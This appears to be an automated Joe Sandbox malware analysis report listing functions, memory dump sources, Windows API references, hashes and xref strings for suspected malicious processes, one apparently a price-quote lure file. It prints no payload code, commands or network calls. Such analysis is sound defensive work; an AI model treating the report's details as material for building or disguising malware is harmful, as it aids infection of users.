Opcode Fuzzy Hash: 6e7e9079986099861db9cb74ca844e2bf5bcbe3ae07a4c4228025889db356bad
Instruction Fuzzy Hash: EA11D0B5D01259AFCB00DF9AD884ACEFFB4FB49310F10852AE918A7340C774A954CFA5

Function 06863ED8 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 236dee69683350b7947b0bf45d1e61ed1e51acd7bed3df6cdc3f4161ba2db23a
Instruction ID: 7ad191f84f04499168277a9f138a553361c90c3be733cc5155907f00e3ccc58f
Opcode Fuzzy Hash: 236dee69683350b7947b0bf45d1e61ed1e51acd7bed3df6cdc3f4161ba2db23a
Instruction Fuzzy Hash: E8018131B101204BDB6495BEA45472FB2EBDBD9720F20D83AF20EC7394EDA2DC424391

Function 0686C888 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 725e7af12c79d775d17f5b17625071a347cc0eb5c7f27522921cd81162e43995
Instruction ID: 0dd38869ad4fc51978f2e803808f931369d82ce6bff3e7e62c0bd37e5a16bd60
Opcode Fuzzy Hash: 725e7af12c79d775d17f5b17625071a347cc0eb5c7f27522921cd81162e43995
Instruction Fuzzy Hash: 7701FC31E242655FDB349A76EC416ADBBB6EB86314F10866DE5C5E73C4CB319802C780

Function 0686EE48 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72e01795d04450c11cf137fdee3740a7252f3195441447f3c1e95aef5e07d983
Instruction ID: 1f747561fbefb98fffa02f0fa6010a2c8599b4c96b9e62c64fec1256117bbe9c
Opcode Fuzzy Hash: 72e01795d04450c11cf137fdee3740a7252f3195441447f3c1e95aef5e07d983
Instruction Fuzzy Hash: FF018C75B140200BDB659A6E9458B2F63DBDBC9A21F14C829F20AC7384EE21DC024395

Function 06869FD0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d0fe3dc4eb77a9b78945b3eb7840cdbeb8d290a2a6eb8fa72b3c5c0e582dfab
Instruction ID: 633bb121875d5768764c8165023e4b015d69bb87f72ce246607c839ad3159ef3
Opcode Fuzzy Hash: 3d0fe3dc4eb77a9b78945b3eb7840cdbeb8d290a2a6eb8fa72b3c5c0e582dfab
Instruction Fuzzy Hash: 9A013130B105154FDB64EA7DD55172EB3D6EB89714F10C869F60AD7384EA72DC018791

Function 0686C898 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81d5d4ef0da4d2ae8b5d728281cadddf3754030a8440711e015a0a45fe9463cf
Instruction ID: 28706b7a766a8df0b7ab8b7dafa4a334c8d8d0443870004f8988abf82e5aca55
Opcode Fuzzy Hash: 81d5d4ef0da4d2ae8b5d728281cadddf3754030a8440711e015a0a45fe9463cf
Instruction Fuzzy Hash: 97012D31F202249BDF24DA66E84169DB776F785314F108439F905E7344DB31A801C7C0

Function 06866138 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bbda28d0bfe146ad4e141b851edd85a982a52c26b972b8281fbcc31a7219b3e
Instruction ID: a1ff4d9cf7cb8beade4e295b9717699bd47c8eec7bd4b62922c048c857d85100
Opcode Fuzzy Hash: 1bbda28d0bfe146ad4e141b851edd85a982a52c26b972b8281fbcc31a7219b3e
Instruction Fuzzy Hash: C8F022B0E082C9ABDF11CB718D1579E7BE99B02208F2084A6E444C7143F136CA418342

Non-executed Functions

Function 06867360 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$dq, xrefs: 06867485
$dq, xrefs: 068674AA
$dq, xrefs: 068678F7
$dq, xrefs: 068674B6
$dq, xrefs: 06867836
$dq, xrefs: 06867479
$dq, xrefs: 068678E1
$dq, xrefs: 068678D5
$dq, xrefs: 068678EB
$dq, xrefs: 06867842

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-3623093008
Opcode ID: 31509758f23856e76800474c5d8864f8ce56bbf6bf8df1bc2ae71c5ce66a330e
Instruction ID: 4a33e626406eb7024b428c977717affbc9b62e71a38706a124974898a344c7d2
Opcode Fuzzy Hash: 31509758f23856e76800474c5d8864f8ce56bbf6bf8df1bc2ae71c5ce66a330e
Instruction Fuzzy Hash: A0121D30A012198FDB64DF69C944A9EB7F2FF88309F2095A9D509EB365DB359D81CF80

Function 0686A9F8 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$dq, xrefs: 0686ABB6
$dq, xrefs: 0686AAFA
$dq, xrefs: 0686AB49
$dq, xrefs: 0686AB80
$dq, xrefs: 0686ABAA
$dq, xrefs: 0686AAEE
$dq, xrefs: 0686AB55
$dq, xrefs: 0686AB74

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-634254105
Opcode ID: 1d198cbaacbab5f089a743fcc6eb0376bf95b13e83fb2ce5869389bcea7d160a
Instruction ID: fc61ef044f4eaafff153fefce59c42179de9ee21fba608dae4768f079d159d2a
Opcode Fuzzy Hash: 1d198cbaacbab5f089a743fcc6eb0376bf95b13e83fb2ce5869389bcea7d160a
Instruction Fuzzy Hash: D8916D70A002099FEB68EF6AD555B6EB7B3FF84305F208429E806F7294DB759D41CB90

Function 06866D60 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$dq, xrefs: 068671FC
$dq, xrefs: 06867042
$dq, xrefs: 068670A8
$dq, xrefs: 06867268
$dq, xrefs: 06867274
$dq, xrefs: 0686709C
.5|q, xrefs: 06866DBB

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: .5|q$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-3447281907
Opcode ID: a39ccd9e69c78a469a033b5fee619d482bbec2850ecd3ff4e1fa87c0448c3cfa
Instruction ID: dd93169d0a3f1005421d6461dc26947e4c69f7e13cbeed83c0316222823aa96f
Opcode Fuzzy Hash: a39ccd9e69c78a469a033b5fee619d482bbec2850ecd3ff4e1fa87c0448c3cfa
Instruction Fuzzy Hash: 67F15F30A01208CFDB55EFA9D554B6EB7B3FF88305F648569E4059B398DB31AC82CB91

Function 06868098 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$dq, xrefs: 06868363
$dq, xrefs: 068682FE
$dq, xrefs: 06868357
$dq, xrefs: 068682F2

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq
API String ID: 0-185584874
Opcode ID: d3806524b9a1110a140d314f8da60636ae2aa0453bde708d57ec5a5286bc40b5
Instruction ID: d04ff34842e01a93e279fb6f8319e03c3eba90b2f489df253971b2f5d9a28030
Opcode Fuzzy Hash: d3806524b9a1110a140d314f8da60636ae2aa0453bde708d57ec5a5286bc40b5
Instruction Fuzzy Hash: 20B15D70A012188FDB64EB6AC55476EB7B2FF84301F248869E509EB394DB71DC82CB90

Function 068684B0 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LRdq, xrefs: 068685F2
$dq, xrefs: 0686852F
$dq, xrefs: 0686853B
LRdq, xrefs: 068685A3

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: LRdq$LRdq$$dq$$dq
API String ID: 0-340319088
Opcode ID: 9446cb9c29d27ab819e177c0e84f60fff56c558c3ebda7a5494ad398e2fea21e
Instruction ID: 6eb9eb17ba46cd9fed4f9a767ba8714b7bd1f27d894c93f8550452a9c2f2a188
Opcode Fuzzy Hash: 9446cb9c29d27ab819e177c0e84f60fff56c558c3ebda7a5494ad398e2fea21e
Instruction Fuzzy Hash: 4C51C570B002158FDB54EB29D949A6E77F2FF84304F148559F50ADB3A5DA70EC41CBA1

Function 0686AD83 Relevance: 5.2, Strings: 4, Instructions: 162COMMON

Download Yara Rule

Strings

$dq, xrefs: 0686AF33
$dq, xrefs: 0686AEB1
$dq, xrefs: 0686AF04
$dq, xrefs: 0686AF5C

Memory Dump Source

Source File: 00000008.00000002.4163278431.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6860000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq
API String ID: 0-185584874
Opcode ID: dec50e3fb156129d41d2742016b566da894e097b4103a7fef8b39a318283e66b
Instruction ID: a6244cba56e5b2c2d801fb86fab68a927c08df2eed42e3207a077140a915bf5a
Opcode Fuzzy Hash: dec50e3fb156129d41d2742016b566da894e097b4103a7fef8b39a318283e66b
Instruction Fuzzy Hash: F9518170E112048FDF69EB6AE5806AEB7F3EB89311F208569E905E7344DB71EC41CB91

Analysis Process: cYDnGbgU.exePID: 2836, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	26
Total number of Limit Nodes:	4

Executed Functions

Function 02E0D369 Relevance: 6.1, APIs: 4, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02E0D3F6
GetCurrentThread.KERNEL32 ref: 02E0D433
GetCurrentProcess.KERNEL32 ref: 02E0D470
GetCurrentThreadId.KERNEL32 ref: 02E0D4C9

Memory Dump Source

Source File: 00000009.00000002.1794001580.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e00000_cYDnGbgU.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 7135b64bc8fdaf7a8ea31b3763de891b3dc157e85dc86d56f9495f7fade037bf
Instruction ID: 18e7bfeff067c665b9a338c0f1020da0fd9df4f14b6372d84751252d6d690d89
Opcode Fuzzy Hash: 7135b64bc8fdaf7a8ea31b3763de891b3dc157e85dc86d56f9495f7fade037bf
Instruction Fuzzy Hash: 3A5168B09003498FDB58DFA9D949BDEBBF1EF48319F20C459E009A72A0DB746984CB25

Function 02E0D378 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02E0D3F6
GetCurrentThread.KERNEL32 ref: 02E0D433
GetCurrentProcess.KERNEL32 ref: 02E0D470
GetCurrentThreadId.KERNEL32 ref: 02E0D4C9

Memory Dump Source

Source File: 00000009.00000002.1794001580.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e00000_cYDnGbgU.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 77027de91eab0a6eeebaea28c70d86e87ddc2a93d1a1d61911f847c9a26fc2ea
Instruction ID: a077a29a726420a7d6c0c9de5b248cb6ee6a5405505decaf4717ad3687cfa84c
Opcode Fuzzy Hash: 77027de91eab0a6eeebaea28c70d86e87ddc2a93d1a1d61911f847c9a26fc2ea
Instruction Fuzzy Hash: 945147B09003498FDB18DFA9D989BDEBBF1EF48314F20C459E409A73A0DB746985CB65

Function 02E0ACE8 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02E0AF3E

Memory Dump Source

Source File: 00000009.00000002.1794001580.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e00000_cYDnGbgU.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8ff33e788bf3655d629ee87d338d5879221c2a5d0bd36caee309c1cd85317650
Instruction ID: f048ceeb0cfd1fd2b3c3d970037143eac1b0bc2d2182f0cb202389c68e141565
Opcode Fuzzy Hash: 8ff33e788bf3655d629ee87d338d5879221c2a5d0bd36caee309c1cd85317650
Instruction Fuzzy Hash: BB712770A007098FD724DF29D48575ABBF1FF88308F10892DD58A97B90DB75E886CB90

Function 02E044F0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02E059A9

Memory Dump Source

Source File: 00000009.00000002.1794001580.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e00000_cYDnGbgU.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 5f5bc22fc9b4a5e506ee8eefde3d10719da3074ba9ad6249bbb56ab913c688fa
Instruction ID: 1c3e45add6a0409ff404b6824037699d536fec5edf95dc34469f03421e800c80
Opcode Fuzzy Hash: 5f5bc22fc9b4a5e506ee8eefde3d10719da3074ba9ad6249bbb56ab913c688fa
Instruction Fuzzy Hash: 9141F4B0C00719CBDB24DFA9C884BDDBBB1BF48304F60806AD409AB251DB756A4ACF91

Function 02E058ED Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02E059A9

Memory Dump Source

Source File: 00000009.00000002.1794001580.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e00000_cYDnGbgU.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b25dea0c00fb0ae3adf54bf48e9255a280ebad86c3cbd116f3a5b0d0688b2dcb
Instruction ID: 8a4f75b45a0ce06125e9ecf070d72794e3e7e5313c870d6bd0b995dd34521c23
Opcode Fuzzy Hash: b25dea0c00fb0ae3adf54bf48e9255a280ebad86c3cbd116f3a5b0d0688b2dcb
Instruction Fuzzy Hash: 0E41E2B0C00719CBDB24DFA9C884BDDBBB1BF49304F60805AD419AB251DB756A4ACF91

Function 02E0D5B8 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02E0D647

Memory Dump Source

Source File: 00000009.00000002.1794001580.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e00000_cYDnGbgU.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fa96bb10902b3c9e4ebcdce2bbfd80a4aa70115329c45bcff6c2c707d54afae9
Instruction ID: fb7c09076edf2b9b11cc364333b48d01a2da281f29c28faaf946c17d4461f4a2
Opcode Fuzzy Hash: fa96bb10902b3c9e4ebcdce2bbfd80a4aa70115329c45bcff6c2c707d54afae9
Instruction Fuzzy Hash: 742116B59002089FDB10CF9AD884ADEBBF5FB48320F14801AE958A3350D378A941CFA4

Function 02E0D5C0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02E0D647

Memory Dump Source

Source File: 00000009.00000002.1794001580.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e00000_cYDnGbgU.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 585fd9fd80c935499aa5654c87f3f06476b6cde2f379c74a685b8ed08d5ddd02
Instruction ID: 1df44f0c58d293c35a60395713268a811304d4c689f203089324fa0317de192f
Opcode Fuzzy Hash: 585fd9fd80c935499aa5654c87f3f06476b6cde2f379c74a685b8ed08d5ddd02
Instruction Fuzzy Hash: 9121C4B59002489FDB10CF9AD984ADEBBF5EB48310F14841AE918A3350D374A954CFA5

Function 02DF24D8 Relevance: 1.5, APIs: 1, Instructions: 49
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 02DF253D

Memory Dump Source

Source File: 00000009.00000002.1793970297.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2df0000_cYDnGbgU.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e1ee96948f412404c9be95b5b32fbf4d6771a46d26226e16f8fb1975538fa03c
Instruction ID: 8ed718124a7d7e3fd27fd16d923b12e9eb003939500f12de81fbdbe9c7c772ec
Opcode Fuzzy Hash: e1ee96948f412404c9be95b5b32fbf4d6771a46d26226e16f8fb1975538fa03c
Instruction Fuzzy Hash: E71125B58003499FCB10DF9AD449BDEFBF8EB49324F10845AD958A7340C374AA84CFA1

Function 02E0AED8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02E0AF3E

Memory Dump Source

Source File: 00000009.00000002.1794001580.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e00000_cYDnGbgU.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: bc2bdbdf3eb0c30f83feca2d9e1b57c617e2ea64c8fe8465ba807bf590ba8a29
Instruction ID: 41783ccdaac71cfb058b3c44104f0c22694226ce0f54e2b4b58f139d03f865ce
Opcode Fuzzy Hash: bc2bdbdf3eb0c30f83feca2d9e1b57c617e2ea64c8fe8465ba807bf590ba8a29
Instruction Fuzzy Hash: 171102B6C003498FCB10DF9AC444ADEFBF5EB88214F10846AD529A7240C379A545CFA1

Function 02DF24E0 Relevance: 1.5, APIs: 1, Instructions: 44
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 02DF253D

Memory Dump Source

Source File: 00000009.00000002.1793970297.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2df0000_cYDnGbgU.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: bdffe0d58e205e970b6e849c3d776df5b1425ac19ce6a5c89b17277bf2349658
Instruction ID: 0423f1e2e23a842c20b2122da97b5ad8c1bde85bda6a9add5858cda9066bea3e
Opcode Fuzzy Hash: bdffe0d58e205e970b6e849c3d776df5b1425ac19ce6a5c89b17277bf2349658
Instruction Fuzzy Hash: 0F11E5B58003499FDB10DF9AD949BDEFBF8EB48324F108459D918A7340C375AA44CFA5

Function 013DD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1793182771.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13dd000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bb85429c62af6c35b45fbb66e2ff905b584a4a112057453a8ed46eb58f0cfde
Instruction ID: 35b88f5fe6ff8700c261c936a7dfb7a66cb2b2524c0fd1f0ed636fbd8fb49ca2
Opcode Fuzzy Hash: 3bb85429c62af6c35b45fbb66e2ff905b584a4a112057453a8ed46eb58f0cfde
Instruction Fuzzy Hash: 572148B2504204DFDB01DF58E9C0B66BF79FB94328F20C56CD90A1B286C736E416C7A1

Function 013DD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1793182771.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13dd000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1440b566782f7784e6dacea3c211b0f24270c7bcf04ac3110ebccbea8d0e503
Instruction ID: 6a63522c1a95443fac9cd7026c4166837ba22e6e3d202ad01b959608211abe43
Opcode Fuzzy Hash: b1440b566782f7784e6dacea3c211b0f24270c7bcf04ac3110ebccbea8d0e503
Instruction Fuzzy Hash: E12128B2504244DFDB05DF58E9C0B26BF66FB8431CF64C569D9090B696C336D416C7A1

Function 02CDD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1793366419.0000000002CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2cdd000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f305934551817f53debb4e46490ed0e466f7c5da93610992b698f0de8c571af
Instruction ID: a560acebf99be41e1dff95dc686404a7fc2ef50bda29ecf466806408477c1639
Opcode Fuzzy Hash: 8f305934551817f53debb4e46490ed0e466f7c5da93610992b698f0de8c571af
Instruction Fuzzy Hash: C721D376A04200DFDB14DF14D9C4B26BBA5EBC4314F64C56DDA0B4B246C336E407CAA1

Function 02CDD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1793366419.0000000002CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2cdd000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd8ec9fbf06fae7f3982ec462b56835fb9c2a215b6b6933eae29d6ce9573a86f
Instruction ID: ddb7ae2047ae58cff6dbdc9cde622d5eaa82a2626e14ca0da7a1d8e8677e4399
Opcode Fuzzy Hash: cd8ec9fbf06fae7f3982ec462b56835fb9c2a215b6b6933eae29d6ce9573a86f
Instruction Fuzzy Hash: 7E210772A04200EFDB05DF14D9C4B26BBA5FB84314F24C6ADEA0B4B352C336D846CB61

Function 02CDD005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1793366419.0000000002CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2cdd000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc4697120a12159fb6cd9430f2ace123dc43d0a05c3346ae7eb26adfdd51156d
Instruction ID: 08d503fe97cd3711fc3a6803713bbceeb0a47c9613c97b77adead4373cd68f46
Opcode Fuzzy Hash: cc4697120a12159fb6cd9430f2ace123dc43d0a05c3346ae7eb26adfdd51156d
Instruction Fuzzy Hash: A121A7755093C08FC712CF24D594715BF71EB86214F28C5DAD9498F6A7C33AD80ACBA2

Function 013DD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1793182771.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13dd000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction ID: 4316cf004986cd64c4c8e603227da49c64e32b4f153441f155156687bc871353
Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction Fuzzy Hash: 43112676504280CFCB12CF54D5C4B16BF72FB84328F24C6A9D8090B297C336D45ACBA1

Function 013DD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1793182771.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13dd000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction ID: 6759f316db75e98a0c6e2a152f341b78cdc9d312666c6783787578e815fb83ec
Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction Fuzzy Hash: 18110376504240DFDB12CF44D5C4B56BF72FB84328F24C2A9D9090B297C33AE45ACBA1

Function 02CDD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1793366419.0000000002CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2cdd000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: 0ce6f51ce69ba3bcb7e2258d17001b30ce867a28c81b6e2c3a42badde3839c87
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: 4711DD76904280DFCB02DF10C5C4B15FBB2FB84324F24C6ADD94A4B696C33AD84ACB61

Function 013DD759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1793182771.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13dd000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1687469b397039290b2b0d55cb95d9e2d02022e6c689e26ce1360442d782714
Instruction ID: 4645d53df802ca3009a34462bbad88ee54b512a9b3900982143890010b98209c
Opcode Fuzzy Hash: e1687469b397039290b2b0d55cb95d9e2d02022e6c689e26ce1360442d782714
Instruction Fuzzy Hash: C101F7720093849AE7114EA9EC84B66BFD8DF51329F19C89AED0D0A2C6C3399840C6B1

Function 013DD758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1793182771.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_13dd000_cYDnGbgU.jbxd

Similarity

API ID:
String ID:
API String ID:
